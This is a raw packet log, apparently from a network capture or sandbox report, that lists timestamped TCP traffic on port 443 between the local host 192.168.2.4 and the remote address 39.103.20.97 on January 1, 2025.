Jan 1, 2025 08:24:34.915694952 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.915747881 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.915846109 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.915879965 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.915899038 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.915904999 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.915920019 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.915944099 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000545025 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000583887 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000608921 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000612020 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000622034 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000638008 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000657082 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000665903 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000672102 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000691891 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000708103 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000715017 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000766039 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000839949 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000874043 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000883102 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000888109 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.000915051 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000926018 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.000967979 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001013994 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001089096 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001118898 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001131058 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001136065 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001147032 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001152039 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001179934 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001183987 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001200914 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001219988 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001225948 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001240015 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001265049 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001339912 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001390934 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001403093 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001432896 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001449108 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001456022 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001471043 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001492977 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001501083 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001557112 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001615047 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001652956 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001658916 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001663923 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001682997 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001688957 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001708031 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001719952 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001725912 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.001741886 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001755953 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001770020 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.001982927 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002013922 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002023935 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002028942 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002038956 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002051115 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002063036 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002068043 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002083063 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002101898 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002222061 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002259970 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002265930 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002270937 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002305031 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002348900 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002379894 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002398968 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002403975 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002414942 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002419949 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002434969 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002439022 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002454042 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002475023 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002490997 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002521992 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002532959 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002540112 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002551079 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002561092 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002587080 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.002592087 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.002631903 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.045222044 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139399052 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139447927 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139450073 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139460087 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139534950 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139544010 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139614105 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139628887 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139698982 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139714956 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139744997 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139827013 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139849901 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139853954 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139863968 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139873028 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139903069 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139906883 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.139930010 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139961958 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.139972925 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140014887 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140093088 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140098095 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140120983 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140136957 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140141010 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140161991 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140163898 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140181065 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140183926 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140208006 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140233994 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140234947 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140243053 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140285969 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140314102 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140353918 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140392065 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140440941 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140486956 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140527010 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140583992 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140588999 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140598059 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140624046 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140628099 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140660048 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140680075 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140703917 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140754938 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140822887 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140834093 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140873909 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140877962 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140902996 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140912056 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140923977 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.140927076 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140937090 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.140943050 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141000032 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141005993 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141093016 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141117096 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141120911 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141134024 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141145945 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141182899 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141185999 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141314030 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141372919 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141405106 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141433001 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141437054 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141444921 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141453028 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141469955 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141473055 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141483068 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141494989 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141508102 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141516924 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141521931 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141539097 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141571045 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141623020 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141623020 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.141629934 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.141686916 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226135015 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226195097 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226208925 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226222992 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226264954 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226389885 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226389885 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226389885 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226398945 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226408958 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226438999 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226447105 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226452112 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226480007 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226491928 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226495028 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226502895 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226536989 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226562977 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226596117 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226658106 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226697922 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226736069 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226744890 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226748943 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226777077 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226793051 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226803064 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226847887 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.226938963 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.226989985 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227039099 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227082014 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227085114 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227092981 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227121115 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227130890 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227133989 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227160931 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227174997 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227237940 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227292061 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227294922 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227302074 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227338076 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227349043 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227351904 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227406979 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227516890 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227551937 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227564096 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227567911 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227581978 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227592945 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227606058 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227608919 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227655888 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227663040 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227690935 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227709055 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227713108 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227740049 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227767944 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227813005 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227854013 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227861881 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227864981 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227895021 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227899075 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227916956 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227920055 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227935076 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227951050 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227957964 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.227993011 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.227997065 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228019953 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228044033 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228163958 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228204012 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228212118 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228215933 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228231907 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228240013 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228255987 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228257895 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228281975 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228285074 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228307009 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228310108 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228334904 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228339911 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.228360891 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.228380919 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.392458916 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.392467976 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392484903 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392595053 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.392601013 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392611980 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392621994 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392668962 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.392673016 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392684937 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392700911 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.392704964 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392746925 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.392750025 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.392786980 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.392824888 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.399950981 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400010109 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400013924 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400019884 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400051117 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400052071 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400067091 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400070906 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400103092 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400131941 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400167942 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400173903 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400182009 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400196075 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400209904 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400228024 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400230885 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400243998 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400274992 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400341988 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400379896 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400387049 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400393963 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400417089 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400429964 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400501013 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400542974 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400578976 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400615931 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400660992 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400687933 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400700092 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400702953 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400727034 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400739908 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400760889 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400803089 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400804043 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400810957 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400844097 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.400954008 CET	443	49950	39.103.20.97	192.168.2.4
